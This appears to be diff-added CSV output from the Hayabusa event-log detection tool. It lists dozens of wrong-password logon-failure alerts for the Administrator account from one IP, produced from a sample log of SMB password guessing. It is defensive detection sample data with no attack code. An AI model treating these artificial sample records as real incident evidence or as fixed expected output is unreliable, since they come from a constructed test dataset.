+2016-09-20 01:51:25.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RAbCN4xKDDlhmrkU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pxBwuSDdNZlE2F96 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M3JkwIQF7yV42rOP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.062 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6QiHHeHeY8yWOiJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.097 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rhzpo2bEgpJCB51w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.145 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AuyPyMMT4wQhLIEz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.194 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: no5bOZf3SEsrETun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vBTHVleOipnyVFIY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JNFE2jNifGI7pELk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LgkAKJ57rYqCdbew | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: daKQcllU63lW4ypy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.426 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GBSPSAoEBS7JRYuf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94bI5pb8CGjY3QZD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w1obedLuMFlHlSvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EPn1yJV358YAFALV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qA7N5DMAJqNYkumM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.663 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Lk95NYGG5iLBFBw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x3DDtXECsK61pIYy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.754 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rt8bfBDTV5wYfBO4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uTYMgN5kmFpyj7xN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RmyF6j61wosCE0sg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fd61fJBRizl2AIGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bDIFX7lsmGqSGvkA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UVmto6S25gU2bkwa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.115 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7QMbzSuGuzzMK0v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.174 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJUynF5bN1Oj0vaP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dg4ZtybY5BnPN0nX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gRmRV9ct3hor8Muk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QRjaP1mj9FgKsGBE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3CCzzatQ195mcxQ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QJPIrtk5GBAhsUlR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 720RHwyXQcxvsJBu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.606 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GofmHRstuhljMDOL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wQUQ4INktwXwRkaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8WHs5hduf7SmUcLK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gdo1txjJXiRLbUDH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JK8jP3ftKQOyutGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdbEjo88dBJRhrKp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZCVkXkwhbuSM654 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z2mc9WScfBa88rtO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.011 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lee7qYLkXQoz8rRh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.057 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f5g1ZKpZuZU1WRoC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h4ST7RrHJxAQHHbn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GtW1hBHF97YqvN4N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.189 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xVKlPytPofO9LQBm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GOkZ9yjvfL51UYXo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fAxfxSbRqGO7Dej0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D7XmvDYk6zFLir09 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.355 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mWcl6CKdSMxd8edZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SxBQlFZvGBqDdobn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.435 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AXN94VanwME6q8rc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.467 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOj7CZ3stJXePY8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXjmqxguFGL3f8cV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHWmdxnRrMbxrdlN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.681 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ROBnjuyHn4FRugk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.754 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zGxuUxasL680O21l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CYoM984EzAkUtBoa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0e3ATNpzeeAf6Qax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1A0dGhpVy8kgiRP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGgNAKJM5RAt9B5K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c3DpedXujvQpZnjQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.019 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BsaSjESaUHbsIxJL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.062 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ca4dlxyEco3VOapw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.100 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Z6lJc7DXAOcNZ2G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Olt5mS7na07VDJE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oCFeQcUMDTs0ev8v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.233 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FYmH6CQrizoZ1DAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iYtujXkzySwZQFk8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KE9v6wzrebvjvDIl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81gmRFFBHI1s4dqi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C8gHWPDjQM8M3tiQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: szj4mJvtFV06CuR2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ceGEl87hOM0InAAd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XRv3C3rRxYXTgckj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
